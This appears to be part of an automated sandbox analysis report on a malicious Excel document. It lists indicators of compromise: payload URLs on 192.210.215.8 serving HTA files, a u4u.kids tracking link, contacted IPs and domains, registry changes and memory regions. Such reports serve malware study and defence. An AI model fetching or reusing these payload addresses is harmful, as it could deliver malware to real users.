https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling
|
24.199.88.84
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://u4u.kids/K
|
unknown
|
||
|
http://go.cr
|
unknown
|
||
|
http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFp
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta50A%25253Ch
|
unknown
|
||
|
http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFV
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFZ
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaEM
|
unknown
|
||
|
https://u4u.kids/b
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFC
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htag
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htahttp://192.210.2
|
unknown
|
||
|
http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFI
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htacepC:
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta...
|
unknown
|
||
|
http://crl.usertru
|
unknown
|
||
|
http://192.210.215.8/
|
unknown
|
||
|
https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&S
|
unknown
|
||
|
https://u4u.kids/nt
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaM
|
unknown
|
||
|
http://192.210.215.8/540/created
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaP
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaP(
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta?
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 39 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
216.58.212.174
|
||
|
drive.usercontent.google.com
|
142.250.186.97
|
||
|
u4u.kids
|
24.199.88.84
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.210.215.8
|
unknown
|
United States
|
|
|
|
24.199.88.84
|
u4u.kids
|
United States
|
||
|
216.58.212.174
|
drive.google.com
|
United States
|
||
|
142.250.186.97
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
'c/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
2060
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1036
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\296D3
|
296D3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
ni/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\335A1
|
335A1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33987
|
33987
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\343A5
|
343A5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33987
|
33987
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 80 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
402F000
|
stack
|
page read and write
|
||
|
419D000
|
heap
|
page read and write
|
||
|
3F3000
|
heap
|
page read and write
|
||
|
24D2000
|
trusted library allocation
|
page read and write
|
||
|
451F000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
7FE88F50000
|
trusted library allocation
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
356000
|
heap
|
page read and write
|
||
|
2292000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1C0000
|
trusted library allocation
|
page read and write
|
||
|
3CC000
|
heap
|
page read and write
|
||
|
1B4C5000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3810000
|
trusted library allocation
|
page read and write
|
||
|
46F6000
|
heap
|
page read and write
|
||
|
1BEDB000
|
heap
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
42F2000
|
heap
|
page read and write
|
||
|
2A6B000
|
stack
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
4532000
|
heap
|
page read and write
|
||
|
44BC000
|
heap
|
page read and write
|
||
|
524000
|
heap
|
page read and write
|
||
|
23F000
|
heap
|
page read and write
|
||
|
2070000
|
heap
|
page execute and read and write
|
||
|
42D6000
|
heap
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
2285000
|
trusted library allocation
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
3800000
|
trusted library allocation
|
page read and write
|
||
|
1A2CC000
|
stack
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
3C67000
|
heap
|
page read and write
|
||
|
283000
|
heap
|
page read and write
|
||
|
4532000
|
heap
|
page read and write
|
||
|
309A000
|
stack
|
page read and write
|
||
|
3C08000
|
heap
|
page read and write
|
||
|
33A8000
|
heap
|
page read and write
|
||
|
3CB0000
|
heap
|
page read and write
|
||
|
328000
|
heap
|
page read and write
|
||
|
32F000
|
heap
|
page read and write
|
||
|
2E10000
|
trusted library allocation
|
page read and write
|
||
|
3BB0000
|
trusted library allocation
|
page read and write
|
||
|
2C4000
|
heap
|
page read and write
|
||
|
23CA000
|
trusted library allocation
|
page read and write
|
||
|
1E0E000
|
stack
|
page read and write
|
||
|
3CB000
|
direct allocation
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
23BA000
|
trusted library allocation
|
page read and write
|
||
|
4C7000
|
heap
|
page read and write
|
||
|
3736000
|
heap
|
page read and write
|
||
|
3B0000
|
direct allocation
|
page read and write
|
||
|
330D000
|
heap
|
page read and write
|
||
|
26AA000
|
trusted library allocation
|
page read and write
|
||
|
1AA59000
|
heap
|
page read and write
|
||
|
335C000
|
heap
|
page read and write
|
||
|
2292000
|
trusted library allocation
|
page read and write
|
||
|
1B650000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
2BE000
|
heap
|
page read and write
|
||
|
647000
|
heap
|
page read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
4866000
|
trusted library allocation
|
page read and write
|
||
|
2CD5000
|
trusted library allocation
|
page read and write
|
||
|
4691000
|
heap
|
page read and write
|
||
|
1C1FB000
|
stack
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
3BFA000
|
heap
|
page read and write
|
||
|
564000
|
heap
|
page read and write
|
||
|
335A000
|
heap
|
page read and write
|
||
|
2540000
|
heap
|
page execute and read and write
|
||
|
42AC000
|
heap
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
7FE88F80000
|
trusted library allocation
|
page read and write
|
||
|
3BFA000
|
heap
|
page read and write
|
||
|
2DE000
|
heap
|
page read and write
|
||
|
65F000
|
heap
|
page read and write
|
||
|
23C5000
|
trusted library allocation
|
page read and write
|
||
|
33A8000
|
heap
|
page read and write
|
||
|
224000
|
heap
|
page read and write
|
||
|
4EA000
|
heap
|
page read and write
|
||
|
3BA000
|
heap
|
page read and write
|
||
|
60C000
|
heap
|
page read and write
|
||
|
2281000
|
trusted library allocation
|
page read and write
|
||
|
4D80000
|
heap
|
page read and write
|
||
|
1AA3C000
|
heap
|
page read and write
|
||
|
7FE88EEC000
|
trusted library allocation
|
page read and write
|
||
|
11F000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
1FE4000
|
heap
|
page read and write
|
||
|
44F2000
|
heap
|
page read and write
|
||
|
46FE000
|
heap
|
page read and write
|
||
|
382000
|
heap
|
page read and write
|
||
|
2C95000
|
trusted library allocation
|
page read and write
|
||
|
1C43C000
|
stack
|
page read and write
|
||
|
23CA000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
7FE89020000
|
trusted library allocation
|
page read and write
|
||
|
2550000
|
remote allocation
|
page read and write
|
||
|
3C3F000
|
heap
|
page read and write
|
||
|
1F1E000
|
stack
|
page read and write | page guard
|
||
|
1C1BF000
|
heap
|
page read and write
|
||
|
4290000
|
heap
|
page read and write
|
||
|
2A5000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
2BA000
|
heap
|
page read and write
|
||
|
7FE88F60000
|
trusted library allocation
|
page read and write
|
||
|
44C9000
|
heap
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
23CD000
|
trusted library allocation
|
page read and write
|
||
|
121E1000
|
trusted library allocation
|
page read and write
|
||
|
47F000
|
heap
|
page read and write
|
||
|
1AA47000
|
heap
|
page read and write
|
||
|
3EE7000
|
heap
|
page read and write
|
||
|
1B19E000
|
stack
|
page read and write
|
||
|
24F000
|
heap
|
page read and write
|
||
|
4A4000
|
heap
|
page read and write
|
||
|
7FE88D5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
1D74000
|
heap
|
page read and write
|
||
|
3D3000
|
heap
|
page read and write
|
||
|
23C4000
|
trusted library allocation
|
page read and write
|
||
|
452B000
|
heap
|
page read and write
|
||
|
4530000
|
heap
|
page read and write
|
||
|
46F6000
|
heap
|
page read and write
|
||
|
4526000
|
heap
|
page read and write
|
||
|
1A929000
|
stack
|
page read and write
|
||
|
3F1E000
|
heap
|
page read and write
|
||
|
2CA5000
|
trusted library allocation
|
page read and write
|
||
|
7FE88DE0000
|
trusted library allocation
|
page read and write
|
||
|
42F2000
|
heap
|
page read and write
|
||
|
2A8000
|
heap
|
page read and write
|
||
|
3711000
|
heap
|
page read and write
|
||
|
1CD0000
|
heap
|
page read and write
|
||
|
21AE000
|
stack
|
page read and write | page guard
|
||
|
34B000
|
heap
|
page read and write
|
||
|
121B1000
|
trusted library allocation
|
page read and write
|
||
|
3FA000
|
heap
|
page read and write
|
||
|
28B000
|
heap
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
4A4000
|
heap
|
page read and write
|
||
|
7FE89050000
|
trusted library allocation
|
page read and write
|
||
|
2CA000
|
heap
|
page read and write
|
||
|
3CA4000
|
heap
|
page read and write
|
||
|
4556000
|
heap
|
page read and write
|
||
|
26A5000
|
trusted library allocation
|
page read and write
|
||
|
3BE0000
|
heap
|
page read and write
|
||
|
42F2000
|
heap
|
page read and write
|
||
|
1E04000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
240000
|
heap
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
4556000
|
heap
|
page read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
1A5DE000
|
heap
|
page execute and read and write
|
||
|
1CB3F000
|
stack
|
page read and write
|
||
|
5C66000
|
trusted library allocation
|
page read and write
|
||
|
4491000
|
heap
|
page read and write
|
||
|
7FE88EE3000
|
trusted library allocation
|
page read and write
|
||
|
328000
|
heap
|
page read and write
|
||
|
420A000
|
heap
|
page read and write
|
||
|
42A000
|
heap
|
page read and write
|
||
|
44C5000
|
heap
|
page read and write
|
||
|
1AF4F000
|
stack
|
page read and write
|
||
|
406A000
|
heap
|
page read and write
|
||
|
23B1000
|
trusted library allocation
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
406A000
|
heap
|
page read and write
|
||
|
1A77E000
|
stack
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
251C000
|
stack
|
page read and write
|
||
|
2D60000
|
trusted library allocation
|
page read and write
|
||
|
2320000
|
heap
|
page read and write
|
||
|
304000
|
heap
|
page read and write
|
||
|
1C7FF000
|
stack
|
page read and write
|
||
|
44F3000
|
heap
|
page read and write
|
||
|
8AE6000
|
trusted library allocation
|
page read and write
|
||
|
21B1000
|
trusted library allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3ABD000
|
stack
|
page read and write
|
||
|
452D000
|
heap
|
page read and write
|
||
|
7FE88E06000
|
trusted library allocation
|
page read and write
|
||
|
7FE88D54000
|
trusted library allocation
|
page read and write
|
||
|
1CBB000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
48D000
|
heap
|
page read and write
|
||
|
7FE88DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FF000
|
trusted library allocation
|
page read and write
|
||
|
7FE88FC0000
|
trusted library allocation
|
page read and write
|
||
|
3FE000
|
heap
|
page read and write
|
||
|
1C3BE000
|
stack
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
4C05000
|
heap
|
page read and write
|
||
|
4520000
|
heap
|
page read and write
|
||
|
42D9000
|
heap
|
page read and write
|
||
|
3749000
|
heap
|
page read and write
|
||
|
3F3000
|
heap
|
page read and write
|
||
|
4AF000
|
heap
|
page read and write
|
||
|
1C1B0000
|
heap
|
page read and write
|
||
|
23CD000
|
trusted library allocation
|
page read and write
|
||
|
4065000
|
heap
|
page read and write
|
||
|
4E3000
|
heap
|
page read and write
|
||
|
7FE89060000
|
trusted library allocation
|
page read and write
|
||
|
159000
|
heap
|
page read and write
|
||
|
3C41000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
42F2000
|
heap
|
page read and write
|
||
|
39B000
|
heap
|
page read and write
|
||
|
505000
|
heap
|
page read and write
|
||
|
1C3E3000
|
heap
|
page read and write
|
||
|
240B000
|
trusted library allocation
|
page read and write
|
||
|
1F1F000
|
stack
|
page read and write
|
||
|
33B0000
|
trusted library allocation
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
3CA4000
|
heap
|
page read and write
|
||
|
1A167000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
1B70E000
|
stack
|
page read and write
|
||
|
3C9A000
|
heap
|
page read and write
|
||
|
7FE88F80000
|
trusted library allocation
|
page read and write
|
||
|
281000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
47B000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
33A0000
|
direct allocation
|
page read and write
|
||
|
3B3000
|
direct allocation
|
page read and write
|
||
|
4D85000
|
heap
|
page read and write
|
||
|
44A000
|
heap
|
page read and write
|
||
|
3440000
|
direct allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
3460000
|
direct allocation
|
page read and write
|
||
|
23C6000
|
trusted library allocation
|
page read and write
|
||
|
4E1000
|
heap
|
page read and write
|
||
|
3BC000
|
heap
|
page read and write
|
||
|
451B000
|
heap
|
page read and write
|
||
|
304000
|
heap
|
page read and write
|
||
|
1A1F6000
|
heap
|
page read and write
|
||
|
23CD000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
2A3000
|
heap
|
page read and write
|
||
|
2CEB000
|
trusted library allocation
|
page read and write
|
||
|
435B000
|
heap
|
page read and write
|
||
|
1C40000
|
heap
|
page read and write
|
||
|
42D6000
|
heap
|
page read and write
|
||
|
4A9000
|
heap
|
page read and write
|
||
|
29D0000
|
trusted library allocation
|
page execute
|
||
|
7FE88D6B000
|
trusted library allocation
|
page read and write
|
||
|
7066000
|
trusted library allocation
|
page read and write
|
||
|
27F000
|
heap
|
page read and write
|
||
|
375D000
|
heap
|
page read and write
|
||
|
29B000
|
heap
|
page read and write
|
||
|
1CE0000
|
heap
|
page read and write
|
||
|
228E000
|
trusted library allocation
|
page read and write
|
||
|
1C290000
|
heap
|
page read and write
|
||
|
4556000
|
heap
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
7FE89040000
|
trusted library allocation
|
page read and write
|
||
|
7FE88F70000
|
trusted library allocation
|
page read and write
|
||
|
44F2000
|
heap
|
page read and write
|
||
|
4021000
|
heap
|
page read and write
|
||
|
42E8000
|
heap
|
page read and write
|
||
|
3D0000
|
direct allocation
|
page read and write
|
||
|
457000
|
heap
|
page read and write
|
||
|
44E8000
|
heap
|
page read and write
|
||
|
3BD1000
|
heap
|
page read and write
|
||
|
42D7000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
46FC000
|
heap
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
1F65000
|
heap
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
3F3000
|
heap
|
page read and write
|
||
|
3C41000
|
heap
|
page read and write
|
||
|
3ED7000
|
heap
|
page read and write
|
||
|
1A155000
|
heap
|
page read and write
|
||
|
337C000
|
trusted library allocation
|
page read and write
|
||
|
1A6DF000
|
stack
|
page read and write
|
||
|
2BA000
|
heap
|
page read and write
|
||
|
7FE88F60000
|
trusted library allocation
|
page read and write
|
||
|
2E4000
|
heap
|
page read and write
|
||
|
7FE88F12000
|
trusted library allocation
|
page read and write
|
||
|
426C000
|
heap
|
page read and write
|
||
|
287000
|
heap
|
page read and write
|
||
|
3CAE000
|
heap
|
page read and write
|
||
|
3CA4000
|
heap
|
page read and write
|
||
|
2CBE000
|
trusted library allocation
|
page read and write
|
||
|
320000
|
trusted library allocation
|
page read and write
|
||
|
4377000
|
heap
|
page read and write
|
||
|
154000
|
heap
|
page read and write
|
||
|
2F0000
|
trusted library allocation
|
page read and write
|
||
|
2AFD000
|
trusted library allocation
|
page read and write
|
||
|
2295000
|
trusted library allocation
|
page read and write
|
||
|
321000
|
heap
|
page read and write
|
||
|
3C6A000
|
heap
|
page read and write
|
||
|
3F16000
|
heap
|
page read and write
|
||
|
3CAB000
|
heap
|
page read and write
|
||
|
23CD000
|
trusted library allocation
|
page read and write
|
||
|
2689000
|
trusted library allocation
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
2250000
|
heap
|
page read and write
|
||
|
44F2000
|
heap
|
page read and write
|
||
|
1B0FB000
|
stack
|
page read and write
|
||
|
184000
|
heap
|
page read and write
|
||
|
7FE88D43000
|
trusted library allocation
|
page read and write
|
||
|
3BD2000
|
heap
|
page read and write
|
||
|
346000
|
heap
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
